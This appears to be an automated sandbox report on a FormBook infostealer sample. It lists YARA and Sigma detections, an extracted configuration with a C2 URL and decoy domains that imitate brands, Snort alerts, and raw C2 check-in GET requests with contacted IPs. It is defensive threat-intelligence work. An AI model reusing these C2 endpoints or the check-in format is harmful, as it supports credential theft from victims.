3.0.ff0231.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.ff0231.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
3.1.ff0231.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.1.ff0231.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.1.ff0231.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
3.2.ff0231.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.ff0231.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.ff0231.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
3.1.ff0231.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.1.ff0231.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.1.ff0231.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
3.2.ff0231.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.ff0231.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.ff0231.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
3.0.ff0231.exe.400000.2.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.0.ff0231.exe.400000.2.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.ff0231.exe.400000.2.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
3.0.ff0231.exe.400000.2.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.0.ff0231.exe.400000.2.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.ff0231.exe.400000.2.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 28 entries

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments

Show sources

Source: Process started

Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3424, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 7024

Sigma detected: Suspicious Rundll32 Without Any CommandLine Params

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe, CommandLine: C:\Windows\SysWOW64\rundll32.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 3424, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 7024

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000003.00000002.730860084.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.prometaly.fr/fh3c/"], "decoy": ["victormatoso.com", "stylecolabpreloved.com", "kylur.top", "federal-funds-deposit.com", "metahairstylist.com", "paynow.gmbh", "vivx.us", "awsul.online", "viuhealth.com", "sputnikenglish.com", "metafacebookapp.com", "teslasmartglasses.com", "returns-fedex.com", "dziekanator.com", "pretshellsbakery.com", "vapplebus.com", "kitan.guru", "amazonexpertsindia.com", "teslaislandboys.com", "metasomeone.com", "nasca.us", "rivianhawaii.com", "sportfacebook.site", "twopairsandaspare.com", "poeqwemuschase.com", "favorinfortworth.com", "auco.us", "usnikeshoesbot.top", "onzo.fr", "taokshopper.us", "alexa-score.com", "bass.ooo", "coca-colameta.com", "evchargeoracle.com", "facebook-meta.net", "thatsgoud.com", "comptesgratuit.fr", "arch-hairsalon.com", "heavycutshairstyling.com", "thecrazycornershop.com", "ladiesfirstmc.net", "schuette.tech", "kujira.us", "porscheofac.com", "chasesecurobanking.com", "bell-ca-ref441.ca", "metarbc.com", "meta-facebook.life", "bolt.my.id", "firsttimehomebuyersmanual.com", "loti.net.co", "balea.us", "futureswirl.com", "aolsearch.us", "lafabrique-souvenirs-france.com", "nuerburgring.us", "paypal-payment.cc", "gatieau.biz", "meta-is-facebook.com", "meta-vision.us", "woodwork.sbs", "scottdunn.online", "bestblondehairstylist.com", "rugdlz.fr"]}

Multi AV Scanner detection for submitted file

Show sources

Source: ff0231.exe

Virustotal: Detection: 33%

Perma Link

Yara detected FormBook

Show sources

Source: Yara match	File source: 0.2.ff0231.exe.2920000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ff0231.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ff0231.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.ff0231.exe.2920000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ff0231.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.ff0231.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ff0231.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.1.ff0231.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.ff0231.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ff0231.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.ff0231.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000000.706889621.000000000F2F4000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.730860084.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1195175405.00000000031A0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000001.676423875.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.675874776.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.731603632.0000000000D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1194078465.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.731581465.0000000000CD0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.679018154.0000000002920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.1195210641.00000000031D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720796020.000000000F2F4000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.674213587.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\nsoCFAB.tmp\xavjqrgsngv.dll

Avira: detection malicious, Label: HEUR/AGEN.1134255

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\nsoCFAB.tmp\xavjqrgsngv.dll

Joe Sandbox ML: detected

Source: 3.0.ff0231.exe.400000.3.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.ff0231.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.ff0231.exe.2920000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 16.0.explorer.exe.744f840.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.rundll32.exe.3434480.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.rundll32.exe.550f840.4.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 3.1.ff0231.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.ff0231.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.ff0231.exe.400000.0.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 16.0.explorer.exe.744f840.3.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 3.0.ff0231.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Source: ff0231.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: wntdll.pdbUGP source: ff0231.exe, 00000000.00000003.671729748.0000000002AF0000.00000004.00000001.sdmp, ff0231.exe, 00000000.00000003.672459058.0000000002960000.00000004.00000001.sdmp, ff0231.exe, 00000003.00000002.731062351.0000000000990000.00000040.00000001.sdmp, ff0231.exe, 00000003.00000002.731312035.0000000000AAF000.00000040.00000001.sdmp, rundll32.exe, 00000009.00000002.1196453197.00000000050FF000.00000040.00000001.sdmp, rundll32.exe, 00000009.00000002.1196239529.0000000004FE0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: ff0231.exe, ff0231.exe, 00000003.00000002.731062351.0000000000990000.00000040.00000001.sdmp, ff0231.exe, 00000003.00000002.731312035.0000000000AAF000.00000040.00000001.sdmp, rundll32.exe, rundll32.exe, 00000009.00000002.1196453197.00000000050FF000.00000040.00000001.sdmp, rundll32.exe, 00000009.00000002.1196239529.0000000004FE0000.00000040.00000001.sdmp
Source:	Binary string: rundll32.pdb source: ff0231.exe, 00000003.00000002.731688712.0000000000D90000.00000040.00020000.sdmp
Source:	Binary string: rundll32.pdbGCTL source: ff0231.exe, 00000003.00000002.731688712.0000000000D90000.00000040.00020000.sdmp

Source: C:\Users\user\Desktop\ff0231.exe	Code function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 0_2_00405C22 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 0_2_00402630 FindFirstFileA,

Source: C:\Users\user\Desktop\ff0231.exe	Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49835 -> 185.53.178.54:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49835 -> 185.53.178.54:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49835 -> 185.53.178.54:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49857 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49857 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49857 -> 34.102.136.180:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 5.9.96.94 80
Source: C:\Windows\explorer.exe	Network Connect: 142.250.203.115 80
Source: C:\Windows\explorer.exe	Domain query: www.teslaislandboys.com
Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80
Source: C:\Windows\explorer.exe	Domain query: www.schuette.tech
Source: C:\Windows\explorer.exe	Domain query: www.meta-facebook.life
Source: C:\Windows\explorer.exe	Domain query: www.facebook-meta.net
Source: C:\Windows\explorer.exe	Network Connect: 185.53.178.54 80
Source: C:\Windows\explorer.exe	Domain query: www.comptesgratuit.fr
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe	Domain query: www.evchargeoracle.com
Source: C:\Windows\explorer.exe	Domain query: www.chasesecurobanking.com

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.prometaly.fr/fh3c/

Source: Joe Sandbox View	ASN Name: HETZNER-ASDE HETZNER-ASDE
Source: Joe Sandbox View	ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
Source: Joe Sandbox View	ASN Name: TANDEMUS TANDEMUS

Source: global traffic	HTTP traffic detected: GET /fh3c/?7nhH=Hxl0d2MH-t9Hyv&z0GdXd=ygpAwtep7WxWCgU1n5iY5amVcELu0tSIdE/9Y9Jyy4nkdNu97XXXbghTbpjnrxNYSyQT HTTP/1.1Host: www.comptesgratuit.frConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /fh3c/?z0GdXd=TEDmW6iEX7An5lAq1gB0cQiS4L3buUHqtO3o3qqMncoo4GVsMboScKfxnSemig/wshnV&7nhH=Hxl0d2MH-t9Hyv HTTP/1.1Host: www.evchargeoracle.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /fh3c/?7nhH=Hxl0d2MH-t9Hyv&z0GdXd=tXPHdmDKONGhRVqCA0IZHOyO0PTL+BRkpbdAk/iYV8rKicqHrA4rokXZ0wK7+ll/WvZA HTTP/1.1Host: www.meta-facebook.lifeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /fh3c/?z0GdXd=N2vEI1OX7w/3udy+ydCYc971PZER2FJlK1gZL6lMnGSu15qwd848spLio4s8j+VNLmhX&7nhH=Hxl0d2MH-t9Hyv HTTP/1.1Host: www.schuette.techConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /fh3c/?7nhH=Hxl0d2MH-t9Hyv&z0GdXd=n2wKPxZ8pCyDi97rnXro6S5Jba3+KYmZJcqoataOVa/Ib+/xmeU19xREWNmNK15lIZxN HTTP/1.1Host: www.teslaislandboys.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /fh3c/?z0GdXd=WoHcE9GCxXT7wUBgkc+2l4Z3+m1n5nn1xCnIHBmko3viCo3Igm4+Oh54SxcB0NGJBR7p&7nhH=Hxl0d2MH-t9Hyv HTTP/1.1Host: www.facebook-meta.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 185.53.178.54 185.53.178.54
Source: Joe Sandbox View	IP Address: 15.197.142.173 15.197.142.173

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 25 Nov 2021 13:52:25 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 13:52:50 GMTContent-Type: text/htmlContent-Length: 275ETag: "618be74a-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 25 Nov 2021 13:53:10 GMTContent-Type: text/htmlContent-Length: 275ETag: "6192576d-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 25 Nov 2021 13:53:31 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
